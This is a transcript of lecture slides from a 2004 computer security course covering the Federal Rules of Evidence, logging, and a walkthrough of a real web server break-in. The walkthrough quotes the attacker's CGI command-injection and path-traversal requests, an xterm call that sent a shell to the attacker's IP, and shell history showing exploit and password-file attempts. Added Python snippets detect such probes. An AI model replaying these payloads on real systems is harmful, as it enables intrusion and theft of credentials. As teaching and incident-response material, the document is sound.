
CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management



Presentation Transcript


  1. CSCI E-170: November 30, 2004 • Administrivia • Federal Rules of Evidence • Logging • Integrity Management

  2. Administrivia • Project Proposals are due today • Who is in your group? • What are you doing? • Not graded • Quiz #2: You will be given 4 papers and expected to write a page on each.

  3. Administrivia 2 • Some students have not turned in any work to date…. • Think about dropping the course. • Students who do not turn in a final project will fail.

  4. Federal Rules of Evidence • 9 Articles • Many states follow FRE • Codifies common law • Why study them?

  5. Article I: Ground Rules • Rule 101 - Scope • Rule 1101 - Does not apply to preliminary questions of fact, grand jury, miscellaneous proceedings • Rule 102 - Purpose: • Fairness • Eliminate unjustifiable expense and delay • Rule 103 - Rulings on Evidence • What to do when opposing parties disagree.

  6. Article II: JUDICIAL NOTICE • Every case involves the use of hundreds or thousands of non-evidence facts • When a witness says “car,” everyone assumes that the “car” is an automobile, not a railroad car, that it is self-propelled, and so on.

  7. ARTICLE III: PRESUMPTIONS IN CIVIL ACTIONS AND PROCEEDINGS • Determines who has the burden of rebutting the evidence. • Presumption imposes on the party against whom it is directed the burden of going forward with evidence to rebut or meet the presumption

  8. ARTICLE IV: RELEVANCY AND ITS LIMITS • Relevant evidence is admissible • Irrelevant Evidence is inadmissible • Evidence that wastes time can be excluded • Character evidence of defendant not admissible to prove conduct (unless introduced by defendant) • Character evidence of victim introduced only in homicide case to rebut evidence that alleged victim was first aggressor • Rule 412 - “rape shield” law

  9. ARTICLE V: PRIVILEGES • “…may be interpreted by the courts of the United States in light of reason and experience”

  10. ARTICLE VI: WITNESSES • Rule 601: Every person is competent to be a witness (except as otherwise provided) • Rule 602: Witness must have personal knowledge • Rule 605: Judge cannot testify as witness • Rule 606: Juror may not testify as witness • Rule 612: Adverse party is entitled to access to a “writing used to refresh memory”

  11. ARTICLE VII: OPINIONS AND EXPERT TESTIMONY • Rule 701: Lay witness may not testify based on “scientific, technical, or other specialized knowledge” • Rule 702: Experts must be qualified; use reliable principles and methods; witness must apply those standards to this case. • Rule 704: Experts may state an opinion on the “ultimate issue,” except for matters of mental state.

  12. ARTICLE VIII: HEARSAY • Rule 801: “Hearsay” is a statement, other than one made by the declarant while testifying at the trial or hearing, offered in evidence to prove the truth of the matter asserted. • Many, many exceptions to hearsay… • 803(5) - Recorded Recollection • 803(6) - Records of regularly conducted activity • 803(7) - Absence of entry in records kept in accordance with 803(6) “to prove nonoccurrence or nonexistence”

  13. ARTICLE IX: AUTHENTICATION AND IDENTIFICATION • Rule 901: Documents must be authenticated; many examples given • Rule 902: Some documents are self-authenticating; (computer records aren’t)

  14. ARTICLE X: CONTENTS OF WRITINGS, RECORDINGS, AND PHOTOGRAPHS • Rule 1002: Originals are required, except where duplicates may be admitted. • Rule 1003: Duplicates may be admitted unless genuine questions are raised about the authenticity or in “unfair” circumstances. • What is an original computer record?

  15. ARTICLE XI: MISCELLANEOUS RULES • Rule 1101: Applicability • Rule 1102: Amendments • Rule 1103: Title

  16. Orin S. Kerr article • What’s the point? • What are “Records of regularly conducted activity?” • Are computer records “monolithic?” • How do you Authenticate computer records? How are they challenged? • When do the Hearsay rules apply? • What’s the deal with postings from websites of white supremacist groups? • What about email in a harassment case?

  17. What is a log? • Definition? • Unix vs. Windows? • Palm?

  18. What gets logged?

  19. What gets logged? • Logins / logouts • Privilege escalation • Security relevant events

  20. What goes in a log?

  21. Why keep logs?

  22. Why look at logs? (Marcus) • Policy • Legality • Cost saving

  23. Common mistakes (Marcus) • #1 – collecting it and not looking at it (might as well log to /dev/null) • #2 – watching logs from perimeter systems while ignoring internal systems • #3 – Designing your log architecture before you decide what you’re going to collect • #4 – Only looking for what you know you want to find instead of just looking to see what you find.

  24. Common Mistakes 2 • #5 – Proceeding without doing back-of-the-envelope estimates of load. • #6 – Thinking your logs are evidence if you don’t collect them right • #7 – Forgetting that this is just a data management problem • #8 – Drinking the XML Kool-ade

  25. How are things logged? • f = fopen("logfile", "w+") • syslog() • logger(1)

  26. Web Logs • access_log vs. error_log
      • 65.54.188.137 - - [30/Nov/2004:00:16:54 -0500] "GET /photos/security/printTifs/medRes/onGray/platePlusStickerGreyMR.tif HTTP/1.0" 200 6017064 "-" "msnbot/0.3 (+http://search.msn.com/msnbot.htm)"
      • 66.35.208.62 - - [30/Nov/2004:00:17:38 -0500] "GET /blog/index.rdf HTTP/1.1" 200 8882 "-" "Jakarta Commons-HttpClient/2.0.1"

  27. Web logs… • grep 'q=' ~www/simson.net/logs/access_log | sed 's/^.*q=//' | awk '{print $1;}' | head
      • smart+identity+card&client=disney-go&start=10"
      • simson&hl=de&lr=&ie=UTF-8&oe=UTF-8&start=20&sa=N"
      • backing+up+raid+drives&hl=en&lr=&ie=UTF-8&oe=UTF-8&start=10&sa=N"
      • lzhuf&hl=en&lr=&ie=UTF-8&start=40&sa=N"
      • brown+simson&FORM=SMCRT"
      • %22home+wiring%22&_sb_lang=en"
      • %22wireless+photo+album%22&lr="
      • lzhuf+public+domain&hl=en&lr=&ie=UTF-8&start=10&sa=N"
      • simson&ie=ISO-8859-1&hl=en&btnG=Google+Search&meta="
      • simson&ie=ISO-8859-1&hl=en&btnG=Google+Search&meta="

  28. Mail Logs
      • 2004-11-13 23:51:35 H=ns.simson.net (64.7.15.234) [64.7.15.234] F=<ruxnezze@swissonline.ch> rejected RCPT <domideltana@ex.com>: Unknown user
      • 2004-11-13 23:51:36 H=ns.simson.net (64.7.15.234) [64.7.15.234] F=<ruxnezze@swissonline.ch> rejected RCPT <domidrumsaloe@ex.com>: Unknown user
      • 2004-11-13 23:51:36 H=ns.simson.net (64.7.15.234) [64.7.15.234] F=<ruxnezze@swissonline.ch> rejected RCPT <domie.douglass@ex.com>: Unknown user
      • 2004-11-13 23:51:37 H=ns.simson.net (64.7.15.234) [64.7.15.234] F=<ruxnezze@swissonline.ch> rejected RCPT <domielihli@ex.com>: Unknown user
      • 2004-11-13 23:51:37 H=ns.simson.net (64.7.15.234) [64.7.15.234] F=<ruxnezze@swissonline.ch> rejected RCPT <domierdoc14@ex.com>: Unknown user
      • 2004-11-13 23:51:38 H=ns.simson.net (64.7.15.234) [64.7.15.234] F=<ruxnezze@swissonline.ch> rejected RCPT <domifdwyer@ex.com>: Unknown user
      • 2004-11-13 23:51:38 H=ns.simson.net (64.7.15.234) [64.7.15.234] F=<ruxnezze@swissonline.ch> rejected RCPT <domil.cpwhiz40@ex.com>: Unknown user
      • 2004-11-13 23:52:01 H=ns.simson.net (cable-67-97-53-251.dct.al.charter.com) [64.7.15.234] F=<mvceubrfvsrm@charter.com> rejected RCPT <gayda@ex.com>: Unknown user
      • 2004-11-13 23:52:01 H=ns.simson.net (cable-67-97-53-251.dct.al.charter.com) [64.7.15.234] F=<mvceubrfvsrm@charter.com> rejected RCPT <jensen@ex.com>: Unknown user
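A run of rejects for guessed local parts, as on this slide, is what an address-harvesting or dictionary run looks like in a mail log. As an added example (not from the lecture), the parser and rate check below key on connecting IP plus envelope sender, since the slide shows one relay IP fronting two different senders; the sample is constructed from the slide's own entries, and the threshold and window values are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# One Exim-style reject line, as in the Mail Logs slide: "H=host (helo) [ip] F=<sender>
# rejected RCPT <recipient>: reason".
REJECT_RE = re.compile(
    r'^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) H=(?P<host>\S+) \((?P<helo>[^)]*)\) '
    r'\[(?P<ip>[^\]]+)\] F=<(?P<sender>[^>]*)> rejected RCPT <(?P<rcpt>[^>]*)>: (?P<reason>.*)$')

def parse_reject(line):
    # Fields of one reject line as a dict with a datetime timestamp, or None.
    m = REJECT_RE.match(line)
    if not m:
        return None
    e = m.groupdict()
    e['ts'] = datetime.strptime(e['ts'], '%Y-%m-%d %H:%M:%S')
    return e

def find_harvesters(lines, threshold=5, window=timedelta(seconds=60)):
    # Key on (ip, envelope sender) rather than ip alone: in the slide the same
    # relay IP fronts two different sender addresses. Report a key when at least
    # `threshold` "Unknown user" rejects fall inside any `window`-long span.
    stamps = defaultdict(list)
    for e in filter(None, map(parse_reject, lines)):
        if e['reason'].startswith('Unknown user'):
            stamps[(e['ip'], e['sender'])].append(e['ts'])
    hits = {}
    for key, ts in stamps.items():
        ts.sort()
        j = 0  # sliding window over the sorted timestamps
        for i in range(len(ts)):
            while ts[i] - ts[j] > window:
                j += 1
            if i - j + 1 >= threshold:
                hits[key] = len(ts)
                break
    return hits

# Constructed sample built from the slide's entries: six rejects for one sender in
# three seconds, then a single reject for a second sender behind the same IP.
SAMPLE = [
    f'2004-11-13 23:51:{s} H=ns.simson.net (64.7.15.234) [64.7.15.234] '
    f'F=<ruxnezze@swissonline.ch> rejected RCPT <{r}@ex.com>: Unknown user'
    for s, r in [('35', 'domideltana'), ('36', 'domidrumsaloe'), ('36', 'domie.douglass'),
                 ('37', 'domielihli'), ('37', 'domierdoc14'), ('38', 'domifdwyer')]
] + [
    '2004-11-13 23:52:01 H=ns.simson.net (cable-67-97-53-251.dct.al.charter.com) '
    '[64.7.15.234] F=<mvceubrfvsrm@charter.com> rejected RCPT <gayda@ex.com>: Unknown user',
]
```

`find_harvesters(SAMPLE)` reports only the first sender; raising the threshold above six reports nothing.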

  29. Radius Logs
      • Sun Mar 18 04:35:24 2001
          Acct-Session-Id = "00000000"
          NAS-IP-Address = 192.168.1.5
          Acct-Status-Type = Stop
          Acct-Session-Time = 0
          Acct-Delay-Time = 0
          Timestamp = 984918924
          Request-Authenticator = Verified
      • Sun Mar 18 04:35:24 2001
          Acct-Session-Id = "06000004"
          User-Name = "admin"
          NAS-IP-Address = 192.168.1.5
          Acct-Status-Type = Start
          Acct-Authentic = Local
          Service-Type = Administrative-User
          Login-Service = Telnet
          Login-IP-Host = 192.168.1.1
          Acct-Delay-Time = 75
          Timestamp = 984918924
          Request-Authenticator = Verified

  30. Security Incidents: Strange Authentication Attempts • I woke up to find these entries in my RADIUS log file:
      Tue Mar 30 10:26:00 2004: Auth: Login incorrect: [config/system] (from nas xxxx/S99)
      Tue Mar 30 10:26:00 2004: Auth: Login incorrect: [config/password admin] (from nas xxxx/S99)
      Tue Mar 30 10:26:00 2004: Auth: Login incorrect: [config/13370n3z] (from nas xxxx/S99)
      Tue Mar 30 10:26:01 2004: Auth: Login incorrect: [password/fawkoffsz] (from nas xxxx/S99)
      Tue Mar 30 10:26:01 2004: Auth: Login incorrect: [password/save] (from nas xxxx/S99)
      http://seclists.org/lists/incidents/2004/Mar/0116.html

  31. Log architectures • UDP log issues • Windows

  32. Logging on Unix • /etc/syslog.conf • /etc/newsyslog.conf • Grep • swatch

  33. Logging on Windows: • Event Viewer • Local security settings

  34. Log hosts & Aggregation

  35. Can you trust these logs?

  36. October 7th, 1997 • 6:00pm • Arrive at hotel in New York City. • Phone system does not support my modem. • Cell phone reception is terrible. • 8:45pm • Phone call from Eric Bates. • “I think that we have a visitor.”

  37. Wed October 7th, 1997 • User http is logged in on ttyp0 and idle for one day:
      bash-2.02# w
      8:57PM up 27 days, 14:19, 5 users, load averages: 0.28, 0.33, 0.35
      USER     TTY  FROM              LOGIN@   IDLE  WHAT
      http     p0   KRLDB110-06.spli  Tue02AM  1days /bin/sh
      simsong  p1   asy12.vineyard.n  8:42PM   15    -tcsh (tcsh)
      ericx    p2   mac-ewb.vineyard  8:46PM   0     script
      ericx    p3   mac-ewb.vineyard  8:46PM   11    top
      ericx    p4   mac-ewb.vineyard  8:53PM   1     sleep 5
      bash-2.02#
      • (Other employees had seen this and ignored it!)

  38. First step: Document the machine • script(1) to create a transcript • ps: process list • netstat -a: open network connections • (lsof): open files • grep 'krldb' access_log: likely avenue of attack • Goals: • Don’t alarm intruder. • Find mechanism of access • Find out what he/she did. • Plug the holes.

  39. ps - processes • Attacker only had two processes • /bin/sh on /dev/ttyp0 (2 copies) • PID 18671 and 26225 • Idle since 2AM the previous day.
      walden: {336} % grep p0 plist
      http 18671 0.0 0.1 244 276 p0 Is Tue02AM 0:02.23 /bin/sh
      http 26225 0.0 0.1 236 276 p0 I+ Tue04AM 0:00.07 /bin/sh
      walden: {337} %

  40. netstat - network connections • “w” gave incomplete hostname: KRLDB110-06.spli • netstat revealed one connection -- X11!
      bash-2.02# netstat -a
      Active Internet connections (including servers)
      Proto Recv-Q Send-Q Local Address          Foreign Address        (state)
      . . .
      tcp        0      0 APACHE.VINEYARD..3098  KRLDB110-06.spli.X11   ESTABLISHED
      • Use netstat -n to get the IP address, from which you can get the full DNS name.

  41. access_log - showed attack • grep krldb /usr/local/apache/logs/access_log
      krldb110-06.splitrock.net - - [06/Oct/1998:02:53:48 -0400] "GET /cgi-bin/phf?Qname=me%0als%20-lFa HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"
      krldb110-06.splitrock.net - - [06/Oct/1998:02:53:50 -0400] "GET /cgi-bin/faxsurvey?ls%20-lFa HTTP/1.0" 200 5469 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"
      krldb110-06.splitrock.net - - [06/Oct/1998:02:53:52 -0400] "GET /cgi-bin/view-source?../../../../../../../../etc/passwd HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"

  42. Attacker GETs
      GET /cgi-bin/phf?Qname=me%0als%20-lFa
      GET /cgi-bin/faxsurvey?ls%20-lFa
      GET /cgi-bin/view-source?../../../../../../../../etc/passwd
      GET /cgi-bin/htmlscript?../../../../../../../../etc/passwd
      GET /cgi-bin/campas?%0als%20-lFa
      GET /cgi-bin/handler/useless_shit;ls%20-lFa|?data=Download
      GET /cgi-bin/php.cgi?/etc/passwd
      GET /cgi-bin/faxsurvey?ls%20-lFa
      GET /cgi-bin/faxsurvey?uname%20-a
      GET /cgi-bin/faxsurvey?id
      GET /cgi-bin/faxsurvey?cat%20/etc/passwd
      GET /cgi-bin/faxsurvey?ls%20-lFa%20/usr/
      GET /cgi-bin/faxsurvey?id
      GET /cgi-bin/faxsurvey?pwd
      GET /cgi-bin/faxsurvey?/bin/pwd
      GET /cgi-bin/faxsurvey?ls%20-lFa
      GET /cgi-bin/faxsurvey?ls%20-lFa%20../conf/
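Added example (not from the lecture): a parser for the access_log lines shown in slides 26, 27 and 41. It extracts the search terms from the referrer properly URL-decoded, where the grep/sed/awk pipeline on slide 27 leaves the closing quote and the &hl=... parameters attached, and it flags the CGI probe requests listed on this slide. The probe patterns are built only from this page's GET list; the search-engine referral in the sample is constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache "combined" format as in the slides' excerpts; match() tolerates slide 41's trailing field.
LOG_RE = re.compile(
    r'(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"')

# Request shapes from the slide's list of attacker GETs: vulnerable CGIs called with a
# query string, and ../ traversal toward /etc/passwd (checked after URL-decoding).
CGI_PROBES = [
    re.compile(r'/cgi-bin/(phf|faxsurvey|campas|htmlscript|view-source|php\.cgi)\?'),
    re.compile(r'\.\./'),
]

def parse_line(line):
    # Return the fields of one log line as a dict, or None if the line does not parse.
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    parts = entry['request'].split(' ')
    entry['method'] = parts[0] if len(parts) >= 2 else ''
    entry['path'] = parts[1] if len(parts) >= 2 else entry['request']
    return entry

def search_terms(entry):
    # Decoded q= value from the referrer, or None. Unlike the grep/sed/awk pipeline this
    # reads only the query string and URL-decodes it, so the closing quote and the
    # &hl=... parameters never leak into the result.
    if entry['referer'] == '-':
        return None
    q = parse_qs(urlsplit(entry['referer']).query).get('q')
    return q[0] if q else None

def is_cgi_probe(entry):
    # True if the URL-decoded request path matches one of the probe patterns.
    return any(p.search(unquote(entry['path'])) for p in CGI_PROBES)

# Constructed sample: a made-up search-engine referral plus one real line from slide 41.
SAMPLE = [
    '66.35.208.62 - - [30/Nov/2004:00:17:38 -0500] "GET /blog/index.rdf HTTP/1.1" 200 8882 '
    '"http://www.google.com/search?q=smart+identity+card&hl=en&start=10" "Mozilla/4.0"',
    'krldb110-06.splitrock.net - - [06/Oct/1998:02:53:50 -0400] "GET /cgi-bin/faxsurvey?ls%20-lFa '
    'HTTP/1.0" 200 5469 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"',
]
```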

  43. Facts so far • It looks like the faxsurvey program allowed attacker to run arbitrary programs. • No evidence that he ran xterm --- except for the X11 connection back to his machine. • We don’t know what he did or what else he knows.

  44. Action plan • Add filter to router to block all access from splitrock (his ISP). • STOP his processes and gcore them to get command history: • kill -STOP PIDs • gcore -c file pid • strings file • Rename/remove the faxsurvey program (part of the hylafax system).

  45. Selected environment variables from /bin/sh #1:
      GATEWAY_INTERFACE=CGI/1.1
      REMOTE_HOST=krldb110-06.splitrock.net
      REMOTE_ADDR=209.156.113.121
      DOCUMENT_ROOT=/htdocs/biz/captiva
      REMOTE_PORT=4801
      SCRIPT_FILENAME=/vni/cgi-bin/faxsurvey
      LOGNAME=http
      REQUEST_URI=/cgi-bin/faxsurvey?/usr/X11R6/bin/xterm%20-display%20209.156.113.121:0.0%20-rv%20-e%20/bin/sh
      DISPLAY=209.156.113.121:0.0
      SERVER_PORT=80
      SCRIPT_NAME=/cgi-bin/faxsurvey

  46. History from /bin/sh #1: st2.c cron.c cxterm.c x2.c qpush.c cat t.c cat .c cat s.c gc c ls -lFa ./s -v c2 ./s p0 ls -lFa / cat .s ls -lFa cat /w ls -lFa / cat .s _=.s $ : not found gcc -o s steal.c ls -lFa *.c gcc -o s s.c ftp 209.156.113.121 gcc -o s st2.c ./s console t .s .121 qpush.c ppp.c t2.c cron.c cxterm.c tcsh x2.c README README.debian qpush qpush.c qpush.c.old gf: not found /tmp mfs:28 /bin/sh • Looks like the attacker was trying to get some sort of root-stealing exploit for Linux (or Debian Linux) to work on the machine.

  47. Selected history from /bin/sh #2: /bin/sh /bin/sh /etc/inetd.conf qpush.c /usr/bin/gcc n/gcc ./cc expr done /bin/sh inetd.conf t) | telnet 127.1 143 cd /etc cat .s which pwd ls -lFa expr $L + 1 ls -lFa ./cc -10 ./cc • Attacker sees that we are running imap

  48. Selected history from /bin/sh #2: ./cc /tmp/.s /tmp cd /tmp cd .s L=100 cd .s L=-100 ls -lFa cd /tmp /bin/sh ./q 127.1 load /bins _=127.1 _=/bins ./cc ./cc -92 ./cc -100 ./cc 100 cat .s ./cx • Attempts to exploit imap vulnerability

  49. Selected history from /bin/sh #2: cat .s export L _=.s cat /etc/passwd |grep "root" DISPLAY=209.156.113.121:0.0 -rvgdsg DISPLAY=209.156.113.121:0.0 cat /etc/passwd |Grep "http" cat /etc/passwd |grep "http" cat /etc/passwd |grep "www" while [ $: done 2 $L echo $L (./i 403 0xefbfd5e8 100; cat) |nc 127.1 143 cx $L $L +1` (./i 403 0xefbfd5e8 100; cat) | telnet 127.1 143 echo ./cc $L L=`expr $L + 1` • Searching for accounts and passwords… • Tries again for imap

  50. Selected history from /bin/sh #2: uname ftp 209.156.113.121 mv pp.c p.c ls -lFa mas* ls -lFa /etc |grep "mas" cat master.passwd telnet 127.1 25 locate modstat which modstat ls -lFa /usr/bin/mo* locate modstate locate ico s.c locate modload grep ftp wildsau.idv.uni-lki i-lki cat /etc/inetd.conf ./q -0 127.1 cat /etc/inetd.coinf ftp 209.156.113.121 gcc -o cc cron.c ftp 209.156.113.121 gcc -o cx cxterm.c • Tries for shadow password file • Tries again for sendmail • Tries for Linux kernel module loader • And so on…
